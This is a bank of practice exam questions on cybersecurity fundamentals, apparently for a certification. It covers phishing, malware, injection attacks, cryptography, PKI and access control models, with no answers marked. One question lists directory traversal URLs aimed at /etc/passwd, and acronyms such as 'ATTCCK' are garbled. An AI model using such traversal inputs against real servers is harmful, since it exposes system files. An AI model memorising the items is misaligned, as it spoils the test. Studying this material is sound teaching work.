The practice of using a telephone system to manipulate user into disclosing confidential information is
known as:

• Whaling

• Spear phishing

• Vishing

• Pharming

Which of the following answers refers to a social engineering attack that exploits SMS or text messages
to deceive recipients into taking harmful actions, such as revealing sensitive information or clicking
malicious links?

• Pharming

• Spoofing

• Quishing

• Smishing

Which of the terms listed below refers to false or misleading information that is spread unintentionally?

• Astroturfing

• Disinformation

• Gaslighting

• Misinformation

Which of the following terms best describes deliberately false or misleading information spread with
the intent to deceive or manipulate?

• Disinformation

• Deception

• Gaslighting

• Manipulation

Which type of social engineering attack relies on identity fraud?

• Pretexting

• Spear phishing

• Tailgating

• Impersonation

A BEC attack is an example of:

• Smishing
 • Phishing

• Vishing

• Pharming

Which of the answers listed below refers to a social engineering technique where an attacker creates a
fabricated scenario or situation to deceive the victim into revealing sensitive information?

• Impersonation

• Credential harvesting

• Pretexting

• Watering hole attack

Which of the following terms refers to a common platform for watering hole attacks?

• Mail gateways

• Websites

• PBX systems

• Web browsers

A fake website mimicking a legitimate online retailer, designed to steal user login credentials is an example
of:

• Malicious software

• Brand impersonation

• Identity fraud

• Watering hole attack

The term "Typosquatting" refers to a deceptive practice involving the deliberate registration of domain
names with misspellings or slight variations that closely resemble well-established and popular
domain names. The primary goal of this strategy is to exploit the common typographical errors made
by users while entering URLs into their web browser's address bar. Beyond capturing inadvertent
traffic, typosquatting may also be used for hosting phishing sites to trick users into divulging sensitive
information, distributing malware through deceptive websites, generating ad
revenue by redirecting mistyped traffic, or engaging in brand impersonation to harm the reputation of
authentic brands or deceive users.

• True

• False
In email communication, what signs can be of help in recognizing a phishing attempt?

• The message contains poor spelling and grammar

• The message asks for personal information

• The message includes a call to action with a sense of urgency

• The message includes suspicious links or attachments

• Any of the above

What would be an appropriate user response to an email phishing attempt? (Select all that apply)

• Not replying to the message or providing any personal information

• Reporting the message to the IT or security department, if applicable

• Deleting the message from the inbox

• Not clicking on any links or downloading any attachments in the message

• Forwarding the message to the sender to verify its legitimacy

• Opening the attachment in a sandbox environment to check its safety

What is the best countermeasure against social engineering attacks?

• Situational awareness

• Implicit deny policy

• User education

• Strong security controls

Malware that restricts access to a computer system by encrypting files or locking the entire system
down until the user performs requested action is called:

• Grayware

• Adware

• Ransomware

• Spyware

A Trojan horse is a type of software that performs harmful actions under the guise of a legitimate and
useful program. The most characteristic feature of Trojan horse is that while it may function
as a legitimate program and possess all the expected functionalities, it also contains a concealed portion of
malicious code that the user is unaware of.

• True

• False

Which type of Trojan enables unauthorized remote access to a compromised system?

• APT
 • RAT

• MaaS

• PUP

A standalone malicious computer program that typically propagates itself over a computer network to
adversely affect system resources and network bandwidth is referred to as:

• Worm

• Fileless virus

• Bot

• Logic bomb

Malicious software collecting information about users without their knowledge/consent is known as:

• Cryptomalware

• Adware

• Ransomware

• Spyware

Which of the answers listed below refer to the characteristic features of bloatware? (Select 3 answers)

• Pre-installed on a device by the device manufacturer or retailer

• Generally considered undesirable due to negative impact on system performance

• Installed without user consent

• Can be pre-installed, downloaded, or bundled with other software

• Generally considered undesirable due to negative impact on system performance, privacy, and
security

Which of the following answers refer to the characteristics of a PUP? (Select 3 answers)

• Often installed without clear user consent

• Can be pre-installed, downloaded, or bundled with other software

• Generally considered undesirable due to negative impact on system performance, privacy, and
security

• Pre-installed on a device by the device manufacturer or retailer

• Generally considered undesirable due to negative impact on system performance

Which of the statements listed below apply to the definition of a computer virus? (Select 3 answers)

• A self-replicating computer program containing malicious segment

• Malware that typically requires its host application to be run to make the virus active

• A standalone malicious computer program that replicates itself over a computer network

• Malware that can run by itself without any interaction

• Malicious code that typically attaches itself to an application program or other executable
component

• A self-contained malicious program or code that does need a host to propagate itself

Which of the following is an example of spyware?

• Keylogger

• Vulnerability scanner

• Computer worm

• Packet sniffer

Malicious code activated by a specific event is called:

• Cryptomalware

• Backdoor

• Rootkit

• Logic bomb

Which of the following answers refers to a collection of software tools used by a hacker to mask intrusion
and obtain administrator-level access to a computer or computer network?

• Rootkit

• Spyware

• Backdoor

• Trojan

What type of action allows an attacker to exploit the XSS vulnerability?

• Code injection

• Privilege escalation

• Session hijacking

• Packet sniffing
Which of the following exploits targets a protocol used for managing and accessing networked resources?

• CSRF/XSRF attack

• XML injection attack

• LDAP injection attack

• SQL injection attack

Which type of exploit targets web applications that generate content used to store and transport data?

• SQL injection attack

• CSRF/XSRF attack

• XML injection attack

• LDAP injection attack

A type of exploit that relies on overwriting contents of memory to cause unpredictable results in an
application is referred to as:

• IV attack

• Privilege escalation

• Buffer overflow

• DLL injection

A situation where an attacker intercepts and retransmits valid data exchange between an application
and a server, or another application is known as:

• Sideloading

• Replay attack

• Phishing attack

• Race condition

Which of the following facilitate(s) privilege escalation attacks? (Select all that apply)

• System/application vulnerabilities

• Password hashing

• System/application misconfigurations

• Network segmentation

• Social engineering techniques

Which of the statements listed below apply to the CSRF/XSRF attack? (Select 3 answers)

• Exploits the trust a website has in the user's web browser

• A user is tricked by an attacker into submitting unauthorized web requests

• Website executes attacker's requests

• Exploits the trust a user's web browser has in a website

• A malicious script is injected into a trusted website

• User's browser executes attacker's script

A dot-dot-slash attack is also referred to as:

• Disassociation attack

• On-path attack

• Directory traversal attack

• Downgrade attack

Which of the following URLs is a potential indicator of a directory traversal attack?

• http://www.example.com/var/../etc/passwd

• http://www.example.com/var/www/../../etc/passwd

• http://www.example.com/var/www/files/../../../etc/passwd

• http://www.example.com/var/www/files/images/../../../../etc/passwd

• Any of the above

Which of the following answers refers to a deprecated wireless authentication protocol developed by
Cisco?

• PEAP

• EAP-TTLS

• LEAP

• EAP-TLS

Which of the answers listed below refers to an open standard wireless network authentication protocol
that enhances security by encapsulating authentication process within an encrypted TLS tunnel?

• PEAP

• EAP

• LEAP

• RADIUS
Which of the programming aspects listed below are critical in the secure application development process?
(Select 2 answers)

• Patch management

• Input validation

• Password protection

• Error and exception handling

• Application whitelisting

A situation in which a web form field accepts data other than expected (e.g., server commands) is an
example of:

• Zero-day vulnerability

• Improper input validation

• Default configuration

• Improper error handling

Which of the following answers refers to a countermeasure against code injection?

• Fuzzing

• Input validation

• Code signing

• Normalization

The term "Secure cookie" refers to a type of HTTP cookie that is transmitted over an encrypted HTTPS
connection, which helps prevent the cookie from being intercepted or tampered with during transit.

• True

• False

Which of the terms listed below refers to an automated or manual code review process aimed at
discovering logic and syntax errors in the application's source code?

• Input validation

• Dynamic code analysis

• Fuzzing

• Static code analysis

A dynamic code analysis allows for detecting application flaws without the need for actual execution of
the application code.

• True

• False
The term "Static code analysis" refers to the process of discovering application runtime errors.

• True

• False

What is the purpose of code signing? (Select 2 answers)

• Disables code reuse

• Confirms the application's source of origin

• Enables application installation

• Validates the application's integrity

• Protects the application against unauthorized use

The practice of finding vulnerabilities in an application by feeding it incorrect input is called:

• Normalization

• Hardening

• Dynamic code analysis

• Fuzzing

In computer security, a mechanism for safe execution of untested code or untrusted applications is
referred to as:

• Sideloading

• Virtualization

• Sandboxing

• Stress testing

Which of the following answers refers to a Windows-specific feature for handling exceptions, errors,
and abnormal conditions in software?

• EPC

• SEH

• EH

• EXR

Address Space Layout Randomization (ASLR) is an OS security technique that randomizes the
location of key data areas in memory. The purpose of ASLR is to prevent attackers from predicting the
location of specific code or data in memory, which adds a layer of defense against memory- based
attacks, such as buffer overflows.

• True

• False
A type of user identification mechanism used as a countermeasure against automated software (such
as network bots) is known as:

• MFA

• CAPTCHA

• SSO

• NIDS

Which of the answers listed below refers to a hardware monitoring and asset tracking method?

• Barcode labels

• QR codes

• RFID tags

• GPS tracking

• All of the above

Which of the following wireless technologies enables identification and tracking of tags attached to
objects?

• GPS

• IR

• RFID

• NFC

Which type of software enables monitoring and tracking of mobile devices?

• MDM

• GPS

• NFC

• GSM

One of the ways to prevent data recovery from a storage drive is to overwrite its contents. The data overwriting
technique is used by drive wipe utilities which might employ different methods
(including multiple overwriting rounds) to decrease the likelihood of data retrieval. As an example, a disk
sanitization utility might overwrite the data on the drive with the value of one in the first
pass, change that value to zero in the second pass, and finally perform a few more passes, overwriting
the contents with random characters.

• True

• False
Which of the destruction tools/methods listed below allow(s) for secure disposal of physical documents?
(Select all that apply)

• Shredding

• Overwriting

• Burning

• Formatting

• Degaussing

Which of the following methods provides the most effective way for permanent removal of data stored
on a magnetic drive?

• Cryptographic erasure

• Data overwriting

• Degaussing

• Low-level formatting

Certificate of destruction is a document issued by companies that conduct secure

device/document disposal. The certificate verifies proper asset destruction and can be used for
auditing purposes. In case of device disposal, the document includes a list of all the items that have
been destroyed along with their serial numbers. It may also describe the destruction
method, specify location (on-site/off-site), or list the names of witnesses who oversaw the entire process.

• True

• False

Which policy typically specifies the period during which certain types of data must be stored prior to
disposal?

• Data protection policy

• Data classification policy

• Data backup policy

• Data retention policy

Vulnerability scanning: (Select all that apply)

• Identifies lack of security controls

• Actively tests security controls

• Identifies common misconfigurations

• Exploits vulnerabilities

• Passively tests security controls

Which of the answers listed below refer to the characteristic features of static code analysis? (Select 3
answers)

• Involves examining the code without executing it

• Often used early in the development process

• Examines code structure, syntax, and semantics to detect issues like syntax errors, coding
standards violations, security vulnerabilities, and bugs

• Typically used later in the software development lifecycle

• Involves executing the code and analyzing its behavior at runtime

• Analyzes runtime properties like memory usage, performance, and error handling to
identify issues such as memory leaks, performance bottlenecks, and runtime errors

Which of the answers listed below refers to a concept that provides insights into methods and tools
that cybercriminals use to carry out attacks?

• TTP

• CVE

• ATTCCK

• CVSS

A dedicated security solution that filters, monitors, and blocks HTTP/HTTPS traffic between a web application
and the Internet is referred to as:

• UTM

• NGFW

• UEM

• WAF

Which of the following solutions provides active network security breach response on an individual
computer system?

• NIDS

• HIDS

• NIPS

• HIPS

Which of the acronyms listed below refers to a risk assessment formula defining probable financial
loss due to a risk over a one-year period?

• ARO

• SLE

• ALE
 • SLA

A software technology designed to provide confidentiality for an entire data storage device is known as:

• TPM

• FDE

• EFS

• HSM

High MTBF value indicates that a component or system provides low reliability and is more likely to fail.

• True

• False

Which part of the AAA security architecture deals with the verification of the identity of a person or
process?

• Accounting

• Authentication

• Auditing

• Authorization

Which of the following answers refers to a routing protocol used in computer networks to determine
the best path for routing data packets from one network node to another?

• BGP

• EIGRP

• RIP

• OSPF

Which of the answers listed below refers to an industry standard for assessing and scoring the
severity of computer system security vulnerabilities?

• SIEM

• CVSS

• OSINT

• SOAR

Which of the following answers refers to a hardware or software solution providing secure remote access to
networks and resources?

• NAC

• RDP
 • SSH

• RAS

Which of the wireless technologies listed below are deprecated and should not be used due to
their known vulnerabilities? (Select 2 answers)

• WPS

• WAP

• WPA2

• WAF

• WEP

Which of the following answers refer(s) to SSDs? (Select all that apply)

• Low performance

• Relatively high device cost

• Lower capacity in comparison to magnetic drives

• High performance

• Relatively low device cost

• Higher capacity in comparison to magnetic drives

• Lack of moving parts (takes advantage of memory chips instead of magnetic platters)

An SWG is a software component, or a hardware device designed to prevent unauthorized traffic from
entering an internal network of an organization. An SWG implementation may include
various security services, such as packet filtering, URL/content filtering, malware inspection, application
controls, AUP enforcement, or DLP.

• True

• False

A type of forensic evidence that can be used to detect unauthorized access attempts or other
malicious activities is called:

• CVE

• IoC

• AIS

• OSINT

Which of the answers listed below refers to a remote access authentication protocol that periodically
re-authenticates client at random intervals to prevent session hijacking?

• EAP

• CHAP
 • PAP

• PEAP

A type of surveillance system comprising video cameras and monitors that enable continuous monitoring
and recording of specific areas is commonly referred to as CCTV.

• True

• False

Which of the following answers refers to an ECC-based method for creating and verifying digital signatures?

• DHE

• ECDSA

• HMAC

• ECDHE

Which of the actions listed below can be taken by an IDS? (Select 2 answers)

• Firewall reconfiguration

• Closing down connection

• Logging

• Terminating process

• Sending an alert

FTPS is an extension to the SSH protocol and runs by default on port number 22.

• True

• False

Which of the following terms refers to a dedicated transport mechanism for cyber threat information?

• STIX

• CVE

• TAXII

• CVSS

Which of the answers listed below refers to a legacy symmetric-key block cipher encryption algorithm?

• RC4

• DES

• RSA
 • DSA

A Microsoft-proprietary protocol providing a user with graphical interface for connecting to another
networked host is known as:

• VDI

• RDP

• SSH

• VNC

Which of the following acronyms refers to a comprehensive strategy and set of procedures
designed to ensure that an organization can continue its critical operations and functions during and
after a disruptive event?

• DRP

• CP

• BCP

• COOP

Which type of Trojan enables unauthorized remote access to a compromised system?

• APT

• RAT

• MaaS

• PUP

The term "AI" refers to computer systems and algorithms that can perform tasks typically requiring
human intelligence, such as problem-solving, learning, and decision-making.

• True

• False

Which of the algorithms listed below does not fall into the category of asymmetric encryption?

• RSA

• GPG

• DSA

• AES

• DHE

• ECDHE

• PGP
A type of cyberattack focused on making a website, service, or network unavailable to users by overloading it
with traffic or malicious requests is called:

• SQLi

• XSS

• CSRF

• DoS

In quantitative risk assessment, this term is used for estimating the likelihood of occurrence of a future
threat.

• ALE

• SLA

• ARO

• SLE

Which of the following answers refers to a cryptographic file generated by an entity requesting a digital
certificate from a CA?

• OID

• CSR

• DN

• CRL

Which of the answers listed below refers to a broad term that encompasses various control and
automation systems used in industrial settings to control and monitor physical processes and
machinery?

• ICS

• PLC

• SCADA

• HMI

ACL, FACL, DAC, MAC, and RBAC are all access control mechanisms that can be used to manage
user permissions and protect the confidentiality, integrity, and availability of data.

• True

• False

A type of access control model that grants object owners the authority to determine access permissions is
referred to as:

• ACL

• RBAC
 • DAC

• MAC

Which wireless technology enables identification and tracking of tags attached to objects?

• WTLS

• GPS

• RFID

• NFC

Which of the following answers refers to a tunneling protocol that is often used in combination with
IPsec to secure VPN connections?

• GRE

• L2TP

• BGP

• SSL

Which of the answers listed below refers to a cloud computing service model in which clients,
instead of buying all the hardware and software, purchase computing resources as an outsourced service
from suppliers who own and maintain all the necessary equipment and software?

• SaaS

• DaaS

• PaaS

• IaaS

A type of forensic evidence that can be used to detect unauthorized access attempts or other
malicious activities is called:

• CVE

• IoC

• AIS

• OSINT

An account lockout might indicate which type of malicious activity?

• Attempt to deliver malicious content

• DoS attack

• Account compromise

• Password brute-forcing attempt

Which of the terms listed below most accurately describes a situation wherein a single account is being
used from multiple locations/devices at the same time?

• Spraying attack

• Concurrent session usage

• Single Sign-On (SSO)

• Impossible travel

Which of the following terms refers to a malicious activity indicator in a situation where a firewall or other
security measure prevents an attempt to deliver malicious payload or perform an
unauthorized action?

• DoS attack

• Resource inaccessibility

• Blocked content

• Excessive system resource consumption

Which of the terms listed below most accurately describes a situation wherein an account is
accessed from a location that is physically impossible for the user to be in?

• Login time restrictions

• Impossible travel

• Concurrent session usage

• Out-of-cycle logging

The term "Out-of-cycle logging" refers to instances where systems or applications produce logs
outside their regular intervals or in abnormal volumes, potentially signaling malicious activity.

• True

• False

Which of the following would indicate an attempt to hide evidence of malicious activity?

• Account lockout

• Resource inaccessibility

• Missing logs

• Concurrent session usage

Which of the answers listed below refers to any type of information pertaining to an individual that can be
used to uniquely identify that person?

• PHI

• Biometrics

• ID
 • PII

Which of the following regulates personal data privacy of the EU citizens?

• PHI

• HIPAA

• PCI DSS

• GDPR

The US Health Insurance Portability and Accountability Act (HIPAA) provides privacy protection for:

• PII

• PI

• PHI

• PIV

The purpose of PCI DSS is to provide protection for:

• Credit cardholder data

• Licensed software

• User passwords

• Personal health information

Which of the answers listed below refer(s) to encryption method(s) used to protect data at rest? (Select
all that apply)

• FDE

• SED

• IPsec

• TLS

• VPN

• EFS

Encryption methods used to protect data in transit include: (Select all that apply)

• NFS

• VPN

• SED

• IPsec

• FDE
 • TLS

Which of the following data states typically requires data to be processed in an unencrypted form?

• Data in motion

• Data at rest

• Data in transit

• Data in use

Which of the answers listed below refer to examples of non-human readable data types? (Select 2 answers)

• Binary code

• XML files

• Machine language

• HTML code

• SQL queries

Which of the following answers refers to an individual or role responsible for overseeing and ensuring
compliance with data protection laws and policies within an organization?

• CTO

• DPO

• CIO

• CSO

A mobile device's built-in functionality enabling the usage of locator applications is known as:

• WPS

• GSM

• SIM

• GPS

Which of the answers listed below refers to a technology that provides control over the usage of a mobile
device within a designated area?

• Geofencing

• Captive portal

• Honeypot

• Geolocation

Which of the following converts plaintext data into ciphertext using an algorithm and a key?
 • Encryption

• Masking

• Tokenization

• Obfuscation

Which of the answers listed below refers to a technique that enables converting input data into a fixed-
size string, making it difficult to reverse or retrieve the original data?

• Obfuscation

• Tokenization

• Hashing

• Encryption

Which of the following answers refer to data masking? (Select 2 answers)

• Replaces sensitive data with fictitious or modified data while retaining its original forma

• Allows for data manipulation in environments where the actual values are not needed

• Transforms data into an unreadable format using an algorithm and an encryption key

• Creates a unique, fixed-length string from the original data

• Replaces sensitive data with a non-sensitive identifier that has no meaning or value
outside the specific system

Which of the answers listed below refers to a situation where sensitive data is stored in a separate
location and can be retrieved with a non-sensitive replacement that can also be processed just like
the original data without the risk of revealing the contents of original data?

• Masking

• Obfuscation

• Encryption

• Tokenization

Which of the following modifies data or code to make it difficult to understand or reverse- engineer, but
without necessarily encrypting or hiding the data?

• Tokenization

• Encryption

• Obfuscation

• Hashing

Which of the answers listed below refer to the advantages of segmentation as a method for securing
data? (Select 3 answers)
 • Enhances security by limiting the spread of cyberattacks

• Helps organizations comply with data regulatory requirements by isolating and protecting
specific data types

• Provides security for data in transit with the use of encryption

• Guarantees data recovery in case of accidental deletion or system failures

• Provides better control over user access to sensitive data

ACL, FACL, DAC, MAC, and RBAC are all access control mechanisms that can be used to manage
user permissions and protect the confidentiality, integrity, and availability of data.

• True

• False

Penetration testing: (Select all that apply)

• Bypasses security controls

• Only identifies lack of security controls

• Actively tests security controls

• Exploits vulnerabilities

• Passively tests security controls

In cybersecurity exercises, red team takes on the role of:

• An attacker

• A defender

• Both an attacker and a defender

• An exercise overseer

In cybersecurity exercises, the defending team is known as:

• Red team

• Blue team

• White team

• Purple team

In cybersecurity exercises, the role of an event overseer (i.e., the referee) is delegated to:

• Red team

• Blue team

• White team

• Purple team
In cybersecurity exercises, a purple team assumes the integrated role of all other teams (i.e., red, blue,
and white).

• True

• False

A penetration test performed by an authorized professional with the full prior knowledge on how the
system that is to be tested works is called:

• Black-hat hacking

• White-box testing

• Black-box testing

• White-hat hacking

Which of the following terms is used to describe a penetration test in which the person
conducting the test has limited access to information on the internal workings of the targeted system?

• Black-box testing

• Fuzz testing

• Gray-box testing

• White-box testing

A penetration test of a computer system performed without prior knowledge of how the system that
is to be tested works is referred to as black-box testing.

• True

• False

In penetration testing, active reconnaissance involves gathering any type of publicly available
information that can be used later for exploiting vulnerabilities found in the targeted system.

• True

• False

In penetration testing, passive reconnaissance relies on gathering information on the targeted

system with the use of various non-invasive software tools and techniques, such as pinging, port
scanning, or OS fingerprinting.

• True

• False

Which of the following terms refers to an agreement that specifies performance requirements for a
vendor?

• MSA

• SLA
 • MOU

• SOW

Which of the acronyms listed below refers to a formal and often legally binding document that outlines
specific responsibilities, roles, and terms agreed upon by two or more parties?

• SOW

• MOA

• MSA

• MOU

A type of nonbinding agreement outlining mutual goals and the general framework for cooperation between
two or more parties is referred to as:

• MOA

• SOW

• MOU

• MSA

A type of legally binding contract that establishes the foundational terms and conditions governing
future agreements between two parties is known as:

• MOU

• SLA

• MSA

• SOW

Which of the following acronyms refers to a document that authorizes, initiates, and tracks the progress
and completion of a particular job or task?

• SOW

• WO

• SLA

• MSA

A detailed agreement between a client and a vendor that describes the work to be performed on a project is
called:

• MSA

• SLA

• WO

• SOW
A legal contract between the holder of confidential information and another person to whom that
information is disclosed restricting that other person from disclosing the confidential information to any
other party is referred to as:

• ISA

• NDA

• BPA

• SLA

Which of the terms listed below refers to a formal contract between business partners outlining the
rights, responsibilities, and obligations of each partner regarding the management, operation, and
decision-making processes within the business?

• MSA

• SLA

• BPA

• MOA

Which of the following statements describe the features of dynamic code analysis? (Select 3 answers)

• Typically used later in the software development lifecycle

• Involves examining the code without executing it

• Analyzes runtime properties like memory usage, performance, and error handling to
identify issues such as memory leaks, performance bottlenecks, and runtime errors

• Often used early in the development process

• Examines code structure, syntax, and semantics to detect issues like syntax errors, coding
standards violations, security vulnerabilities, and bugs

• Involves executing the code and analyzing its behavior at runtime

Which of the terms listed below refers to tracking and managing software application components,
such as third-party libraries and other dependencies?

• Version control

• Package monitoring

• Configuration enforcement

• Application hardening

Which of the following terms refers to threat intelligence gathered from publicly available sources?

• IoC

• OSINT
 • RFC

• CVE/NVD

Which of the terms listed below refers to a US government initiative for real-time sharing of cyber threat
indicators?

• AIS

• STIX

• TTP

• CVSS

What is STIX?

• A type of vulnerability database

• Common language for describing cyber threat information

• US government initiative for real-time sharing of cyber threat indicators

• Transport mechanism for cyber threat information

A dedicated transport mechanism for cyber threat information is called:

• TCP/IP

• TLS

• TAXII

• S/MIME

Which of the following provides insights into the methods and tools used by cybercriminals to carry
out attacks?

• CVE

• IoC

• AIS

• TTP

Which of the following statements does not apply to dark web?

• Typically requires specialized software to access its contents

• Forms a large part of the deep web

• Not indexed by traditional search engines

• Often associated with trading stolen data, malware, and cyber threats

Penetration testing: (Select all that apply)

• Bypasses security controls

 • Only identifies lack of security controls

• Actively tests security controls

• Exploits vulnerabilities

• Passively tests security controls

A responsible disclosure program is a formal process established by an organization to

encourage security researchers and ethical hackers to report vulnerabilities they discover in the
organization's systems or software. A bug bounty program is a specific type of responsible
disclosure program that offers financial rewards to security researchers for reporting valid vulnerabilities.

• True

• False

An antivirus software identifying non-malicious file as a virus due to faulty virus signature file is an example
of:

• Fault tolerance

• False positive error

• Quarantine feature

• False negative error

Which of the answers listed below refers to a situation where no alarm is raised when an attack has
taken place?

• False negative

• True positive

• False positive

• True negative

A measure of the likelihood that a security system will incorrectly reject an access attempt by an authorized
user is referred to as:

• FAR

• CER

• CRC

• FRR

Which of the following terms refers to a framework and knowledge base that provides understanding of
TTPs used during cyberattacks?

• CVSS

• ATTCCK
 • STIX

• TAXII

Which of the answers listed below refers to an industry standard for assessing and scoring the severity
of computer system security vulnerabilities?

• SIEM

• CVSS

• OSINT

• SOAR

Which of the following refers to a system that identifies, defines, and catalogs publicly known
cybersecurity vulnerabilities?

• TAXII

• CVE

• STIX

• CVSS

What is Exposure Factor (EF) in vulnerability analysis?

• The likelihood that a vulnerability will be exploited in a real-world scenario

• The rate at which vulnerabilities are discovered and reported

• The degree of loss that a realized threat would have on a specific asset

• The measure of the potential impact of a vulnerability on an organization's assets

Which of the statements listed below does not refer to a vulnerability response and remediation technique?

• Applying updates or fixes provided by software vendors to address the vulnerability

(patching)

• Ensuring financial recovery from the costs associated with a successful cyberattack
(insurance)

• Dividing a network into smaller, isolated zones to limit the potential impact of a
vulnerability (segmentation)

• Mitigating the risk associated with a vulnerability that cannot be immediately patched by
implementing alternative security measures (compensating controls)

• Delaying or forgoing a patch for a specific system, e.g., when applying a patch may not be
feasible due to compatibility issues or potential disruptions to critical systems (exceptions and
exemptions)

• All of the above answers are examples of vulnerability response and remediation
techniques
 The practice of isolating potentially malicious or suspicious entities to prevent them from causing harm
to the rest of the network or system is known as:

• Sandboxing

• Containerization

• Quarantine

• Segmentation

Which of the following answers refer to SCAP? (Select 3 answers)

• A type of security system designed to collect logs and events from various sources

• Designed to provide a centralized user interface for accessing collected data

• A collection of standards developed by NIST

• Provides a common language for communicating security information

• Allows different security tools to share data and work together more effectively

• Enables real-time threat detection, incident response, and compliance monitoring

Which of the answers listed below refer to SIEM? (Select 3 answers)

• Allows different security tools to share data and work together more effectively

• Designed to provide a centralized user interface for accessing collected data

• A collection of standards developed by NIST

• Enables real-time threat detection, incident response, and compliance monitoring

• A type of security system designed to collect logs and events from various sources

• Provides a common language for communicating security information

Which of the following acronyms refers to software or hardware-based security solutions

designed to detect and prevent unauthorized use and transmission of confidential information?

• IPS

• DLP

• IDS

• DEP

Simple Network Management Protocol (SNMP) is a UDP-based, application layer protocol used in
network management systems to monitor network-attached devices. SNMP is typically integrated into
most modern network infrastructure devices such as routers, bridges, switches, servers,
printers, copiers, fax machines, and other network-attached devices. An SNMP-managed network
comprises three essential components: a managed device, a network-management software
module that resides on a managed device (Agent), and a Network Management Station (NMS),
which runs applications responsible for monitoring and controlling managed devices, as well as
collecting SNMP information from Agents. The manager receives notifications (Traps and InformRequests)
on UDP port 162, while the SNMP Agent receives requests on UDP port 161.

• True

• False

An SNMP-compliant device includes a virtual database containing information about

configuration and state of the device that can be queried by an SNMP management station. This type of
data repository is referred to as:

• MIB

• DCS

• NMS

• SIEM

Of the three existing versions of the Simple Network Management Protocol (SNMP), versions 1 and 2
(SNMPv1 and SNMPv2) offer authentication based on community strings sent in an
unencrypted form (a.k.a. cleartext). SNMPv3 provides packet encryption, authentication, and hashing
mechanisms that allow for checking whether data has changed in transit.

• True

• False

Which of the following answers refers to a family of cryptographic hash functions designed for various
security-related applications, including digital signatures, password storage, secure
communications, and data integrity verification?

• RSA

• AES

• PKCS

• SHA

Which of the hash functions listed below offers the highest level of security?

• MD5

• SHA-3

• RIPEMD-160

• HMAC

Which of the following combines a cryptographic hash function with a secret key to provide a means of
verifying both the authenticity and integrity of a message or data?

• MD5

• DSA

• HMAC
 • DES

Which of the answers listed below refers to a non-cryptographic hash function often used for
error-checking purposes?

• MD5

• CRC

• SHA

• RIPEMD

Which of the following answers refers to a type of additional input that increases password
complexity and provides better protection against brute-force, dictionary, and rainbow table attacks?

• Seed

• IV

• Salt

• Shim

A pseudo-random data added to a password before hashing is referred to as:

• Shim

• Salt

• IV

• Seed

Which cryptographic technique is used to prevent the effectiveness of rainbow tables in cracking hashed
passwords?

• Data masking

• Two-Factor Authentication (2FA)

• Key stretching

• Salting

Which of the answers listed below refers to a cryptographic technique that verifies the
authenticity and integrity of digital documents or messages by using a unique encrypted identifier from
the sender?

• Digital signature

• Cryptographic hash function

• Digital certificate

• Asymmetric encryption
 Which of the following answers refer to algorithms used for generating and verifying digital signatures?
(Select 3 answers)

• ECDSA

• RSA

• ECDHE

• DSA

• GPG/PGP

Which of the answers listed below refer to DSA? (Select 3 answers)

• Asymmetric algorithm

• Used for the key exchange process

• Symmetric algorithm

• Provides authentication, integrity, and non-repudiation

• Specifically designed for creating and verifying digital signatures

• Used for encryption

Which of the following answers refer to the characteristic features of RSA? (Select 3 answers)

• Asymmetric encryption algorithm

• A public key used for encryption and a private key used for decryption

• Suitable for bulk data encryption

• Used for secure communications, digital signatures, and key exchange

• Symmetric encryption algorithm

• A single key used for both encryption and decryption

Which of the answers listed below describe(s) the characteristics of ECDSA? (Select all that apply)

• Provides authentication, integrity, and non-repudiation

• Based on elliptic curve cryptography

• Designed for data encryption

• Specifically designed for creating and verifying digital signatures

• More computationally efficient than other signature algorithms

• Enables the key exchange process

Given the computational limitations of IoT devices, smartcards, and mobile devices, which of the following
digital signature algorithms would be the most efficient choice due to its smaller key
size and lower processing requirements?
 • RSA

• ECDHE

• DSA

• ECDSA

• ECC

Key stretching is a cryptographic technique that enhances the security of sensitive data, such as
cryptographic keys and passwords. It works by repeatedly applying a resource-intensive function or
algorithm to the input data, thus increasing the computational effort required to derive the
original key or password, which makes the data more resistant to brute-force, dictionary, or
rainbow table attacks.

• True

• False

Which of the following is an example of a key stretching algorithm?

• RIPEMD

• SHA

• HMAC

• PBKDF2

The term "Open public ledger" is used to describe a distributed database stored across multiple
computers in a P2P network.

• True

• False

Blockchain technology is an example of:

• Online payment gateway

• Centralized database

• Open public ledger

• Cloud storage system

Which of the answers listed below refers to a set of standards and specifications that define
various cryptographic techniques, including formats for public keys, private keys, digital
signatures, and digital certificates?

• ITIL

• RFC

• PKCS

• ISO/IEC
 Which of the following defines a file format for storing and exchanging personal identity information,
including private keys and digital certificates?

• P10

• P11

• P12

• P13

A type of digital document that verifies the identity of an individual, device, service, or organization in
online communications is known as:

• Encryption key

• Digital certificate

• Identity token

• Digital signature

What is the role of Registration Authority (RA) in PKI? (Select 2 answers)

• Accepting requests for digital certificates

• Validating digital certificates

• Authenticating the entity making the request

• Providing backup source for cryptographic keys

• Issuing digital certificates

Which of the answers listed below refers to a trusted third party responsible for issuing, revoking, and
managing digital certificates?

• RA

• DN

• CA

• CSP

Which of the following answers refers to a means for periodic publication of all digital certificates that
have been revoked?

• CRL

• OSPF

• RA

• CSR

Which of the answers listed below refers to a protocol that enables on-demand querying of the revocation
status of a digital certificate?
 • CSP

• OCSP

• DN

• CRL

What is the fastest way to check the validity of a single digital certificate?

• CSR

• DN

• CRL

• OCSP

Which of the following answers refer(s) to the Mandatory Access Control (MAC) model? (Select all that
apply)

• Users are not allowed to change access policies at their own discretion

• Labels and clearance levels can only be applied and changed by an administrator

• Every object has an owner who at his/her own discretion determines what kind of
permissions other users can have to that object

• Access to resources based on user identity

• Every resource has a sensitivity label matching a clearance level assigned to a user

Discretionary Access Control (DAC) is an access control model based on user identity. In DAC, every
object has an owner who at his/her own discretion determines what kind of permissions other users
can have for that object.

• True

• False

Which type of control access model connects user permissions to their specific responsibilities?

• DAC

• RBAC

• MAC

• ABAC

Which access control model allows for defining granular rules that consider user roles, time constraints,
and network access restrictions?

• ABAC

• MAC

• RuBAC
 • DAC

• RBAC

Examples of properties used for defining access policies in Attribute-Based Access Control (ABAC)
model include:

• Subject (i.e., user or process requesting access)

• Type of action (for example "read", "write", "execute")

• Resource type (medical record, bank account etc.)

• Environment (contextual data, such as time of day or geolocation)

• All of the above

Which access control model defines access control rules with the use of statements that closely
resemble natural language?

• DAC

• ABAC

• MAC

• RBAC

Which of the access control models listed below enforces the strictest set of access rules?

• MAC

• RBAC

• DAC

• ABAC

Which of the following access control methods would be the most suitable for scheduling system
maintenance tasks during periods of low user activity?

• Resource provisioning

• Time-of-day restrictions

• Principle of least privilege

• Just-in-time permissions

The principle of least privilege is a security rule that prevents users from accessing information and
resources that lie beyond the scope of their responsibilities.

• True

• False
